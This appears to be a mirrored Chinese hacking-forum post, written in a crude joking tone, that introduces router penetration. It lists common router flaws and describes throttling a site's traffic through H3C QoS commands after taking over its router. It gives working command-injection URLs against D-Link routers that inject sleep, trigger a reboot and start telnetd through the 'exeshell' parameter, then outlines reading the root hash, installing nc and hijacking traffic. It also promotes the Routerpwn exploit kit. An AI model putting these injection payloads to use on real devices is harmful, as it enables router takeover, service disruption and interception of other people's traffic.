WooYun Zone镜像——屌丝浅谈路由器漏洞挖掘(科普文)

admin 2020-7-9 1201

想在国内找一些路由渗透的纪实,但还是木有什么结果,就是今晚给国内某路由厂商提交一些漏洞时,还被人家鄙视了,哎。什么狗屁心态。不管了,留给我未来的儿子玩吧。说不定可以搞出什么东西。呵呵,扯远了,今晚就结合国外的一些科普文做一些讲解吧。大牛别喷我,我也只是自己写写笔记意淫意淫….别喷!

++++++我是淫荡的分割线++++++++

一,为什么要定义单独的路由安全?

(1)对于渗透湿而言:

如今,更多的渗透湿都是重在于web层的渗透,总是通过各种大杀器拿下内网机器权限,然后各种嗅探,但半天才发现,坑!内网划分了vlan 。(tip:VLAN(Virtual Local Area Network)的中文名为”虚拟局域网”。VLAN是一种将局域网设备从逻辑上划分成一个个网段,从而实现虚拟工作组的新兴数据交换技术。这一新兴技术主要应用于交换机和路由器中,但主流应用还是在交换机之中。)对于到这一层,很多人都是放弃了,或者去换了别的奇技淫巧,更是APT.但往往我们的收获却是很少很少,对于那些白帽做内网的授权渗透时,web服务器的数量更是越来越少,但由于公司对员工的管理以及安全部署,更是划分了各种vlan保护数据的安全和员工的限制。有些对数据敏感的公司,为了防止来公司参观的领导和游客分别划分了wifi 的vlan,这是为什么?原来越多渠道通过wifi和路由安全这个平台向内网的数据伸手,由wifi到核心数据盗取的案例已经很多了,手法都是差不多的,你懂的。

(2)对于管理员而言:

路由器和交换机,还有硬防只是个用来联网的设备,而这些也往往是问题的所在,如今的管理员更多投入在服务器的安全上,网站打开慢?mysql发包数没设置好吧!有时开的有时卡?论坛插件太臃肿了吧!甚至是监控平台,都仅仅是写系统的性能状况。。却没关注路由的安全。你会说,靠,黄昏,扯了半天,你还是没把我的站日下….我给我自己划了个vlan,vps用了某某宝加速,还用某某狗看门,看你怎么进,跟你说喔,上周某某宝还举行比赛,然后添加了很多规则,我看你怎么绕。。。 看到这里,我也顿时语塞,难度好大…..

换一种方法,找到另一个vlan,没狗狗,没宝宝的,然后提权……通过命令识别路由类型和型号,最后在网上找到路由漏洞的exp,拿到路由权限…(ps:这里环境很多,有三层交换机的,还有注意其中的树协议 )

然后就是限速啦~!这里就是h3c的限速规则

# 配置ACL规则匹配源IP为10.0.0.2的流量

<H3C> system-view

[H3C] acl number 3001

[H3C-acl-adv-3001] rule permit ip source 10.0.0.2 0

[H3C-acl-adv-3001] quit

# 配置ACL规则匹配目的IP为10.0.0.20的流量

[H3C] acl number 3002

[H3C-acl-adv-3002] rule permit ip destination 10.0.0.2 0

[H3C-acl-adv-3002] quit

# 配置流分类,匹配ACL规则3001,即匹配源IP为10.0.0.20的流量

[H3C] traffic classifier source_hostA

[H3C-classifier-source_hostA] if-match acl 3001

[H3C-classifier-source_hostA] quit

# 配置流分类,匹配ACL规则3002,即匹配目的IP为10.0.0.20的流量

[H3C] traffic classifier destination_hostA

[H3C-classifier-destination_hostA] if-match acl 3002

[H3C-classifier-destination_hostA] quit

# 配置流行为,用于对上行流量进行流量监管,速率为100kbps

[H3C] traffic behavior uplink

[H3C-behavior-uplink] car cir 100

[H3C-behavior-uplink] quit

# 配置流行为,用于对下行流量进行流量监管,速率为100kbps

[H3C] traffic behavior downlink

[H3C-behavior-downlink] car cir 100

[H3C-behavior-downlink] quit

# 配置QoS策略,用于端口入方向,即用户的上行方向

[H3C] qos policy uplink

[H3C-qospolicy-uplink] classifier source_hostA behavior uplink

[H3C-qospolicy-uplink] quit

# 配置QoS策略,用于端口出方向,即用户的下行方向

[H3C] qos policy downlink

[H3C-qospolicy-downlink] classifier destination_hostA behavior downlink

[H3C-qospolicy-downlink] quit

# 在端口上下发QoS策略,匹配出入方向的流量

[H3C] interface GigabitEthernet 3/0/1

[H3C-GigabitEthernet3/0/1] qos apply policy uplink inbound

[H3C-GigabitEthernet3/0/1] qos apply policy downlink outbound

然后处于内网的10.0.0.20 ,上传只有1kb 下载只有1kb 了,网站就这样开不了了

开始那个机油以为我爆了dns的菊花,但结果并不是,DDOS?我一个小菜怎么肯能干掉某宝宝。。。最后告诉他是我改了中控路由。。。最最后怎么办,只好协同机房的机油一起修补了这个洞…..方法就是 更新路由器固件 。简单点说法,就是给路由器刷机….点到即止。。只要拿到了路由权限可以干很多事情!!!因为你手里控制着整个机房的流量…你说流量能干吗???

建议你去看看刺总的文章,详情猛戳 这里 互联网如何赚钱 http://taosay.net/?p=506

二.废话后的冰J凌

(1)好热的天….扯了这么多废话,再次回到路由器的构架上….

内网渗透可以戳这里

http://www.arc5ch.com/archives/category/%e5%86%85%e7%bd%91%e5%92%8c%e8%b7%af%e7%94%b1%e5%ae%89%e5%85%a8

无论何时何地,路由器的配置总是最低的 一般都是4~128MB的内存 4M或者8MB的闪存,还有80~900HZ的处理器,哎,现在的手机处理器动不动就是双核1.5GHz 完爆路由器配置啊,但是路由器只是作为一个行为管理和流量,协议处理的机器,并不需要太多的页面于用户进行交互,所以,没有所以了,大部分路由器都是采用linux系统,所以很多时候可以通过内核漏洞进行远程溢出或者其他方法提权。

(2)

默认密码,不同路有密码不一样…还有一些路由返厂密码…唉,利用方法后边会介绍的

(3)

默认的telnet

(4)

开放的端口

PORT STATE SERVICE

21/tcp open ftp

80/tcp open http

139/tcp open netbios-ssn

445/tcp open microsoft-ds

(5)

呵呵,猥琐的时候,能接触到实体机,可以自己改装JTAG接口直接读数据…啪啪啪

(6)

Web登陆界面的burp爆破…你懂的

(7)

很多地方没有过滤,可以用很多姿势插入代码(xss)

(8)

管理员认证绕过

(9)

远程命令执行….啪啪啪

(10)

perl有着“taint mode” php输出未认证和过滤

(11)

网站和路由器往往与JS验证输入,而不是之后GET / POST

(12)

通过劫持输出源,并加以利用,比如说QQ空间载入的第一个跳转。。呵呵,你懂的

(13)

目录遍历,password文件下载

以上都是总结出来的…

下边来个实例 D-LINK的….

比如说 ping测试,可以被系统直接调用,和输出,但这里木有过滤

http://192.168.0.1/tools_vct.php?pingIP=192.168.0.1

我们可以用这种姿势插入

比如说让路由器进入休眠状态,后入!后入30个休眠命令

http://192.168.0.1/tools_vct.php?pingIP=127.0.0.1%3B%20sleep,2030%

其中要加入个空格,转成20% ,很多时候做路由渗透测试,没有进行转义,导致没有执行成功就以为没有洞….我就因此错过了几个,虽然后边自己也发现了,所以在这提醒一下大家 :D

睡前再来条黄瓜吧,这条黄瓜就是

http://192.168.0.1/tools_system.php

它能够重启路由器,也就是能被系统直接调用,后来我们在路由器固件里发现了利用的js

http://192.168.0.1/sys_config_valid.xgi?exeshell=submit%20REBOOT

唉,就像是csrf+远程命令执行

exeshell是一个非常淫荡的变量名

还可以这样继续插入,啪啪啪,路由器休眠了

http://192.168.0.1/sys_config_valid.xgi?exeshell =%60sleep 30%60

呵呵,你又开始鄙视我了 屌丝黄昏,你除了会关我路由器你还能干吗?你除了会啪啪啪还会什么?

前边提到了exeshell是一个非常淫荡的变量名

然后我们这样插入

http://192.168.0.1/sys_config_valid.xgi?exeshell =%60telnetd%60

然后你的telnet就打开了,我能干啥???你说我能干啥??我还能干啥?直接用这个exeshell读取root的hash值,然后啪啪啪进入你的telnet,装个改装版的nc,直接进行流量劫持….我感觉这个才是真正的流量劫持啊……

总结

写了一个晚上…真是累趴了,凌风个坏蛋……唉,反正国内都木有科普文,我就自己写一篇意淫吧,反正看的人不多,国内路由安全发展太缓慢,我在这里提一下…算是爆料吧…某厂路由是有后门的,是被厂家偷偷加的还是官网被日加的,谁都不懂……

平时可以来我博客 dusk’s blog http://www.arc5ch.com 看看吧

看了这篇文章你肯定会问,屌丝黄昏,有木有路由渗透的大杀器,我的回答是,有!但是很少,比如说BT5,msf里边都有,还有routeker渗透套件,不过估计routeker还需要很久才会公布,这里就推荐一款国外的吧

Routerpwn

Routerpwn渗透测试是一种住宅的路由器的安全审计工具。

这是一个编译运行本地和远程网络攻击的准备。 JavaScript和HTML编程以运行在所有的“智能手机和移动互联网设备。您可以使用当地开采离线没有互联网连接。 您可以更改,目的IP地址,点击[IP]链接旁边的漏洞。

标签:如何使用Android dns325的routerpwn,的android routerpwn,,routerpwn下载,dns325截图,dns命令descargar路由器PWN第机器人,DLINK的android Android应用程序,DLINK dns325,routerpwn 2013。

其中可以利用

DNS-320的D-Link DNS-325执行命令

DNS-320的D-Link DNS-325的信息披露

DNS-320的D-Link DNS-325的信息披露

TRENDNET TV-IP摄像机绕过认证

还有什么缺的地方大家提出来一起探讨吧 :D


最新回复 (1)
返回
发新帖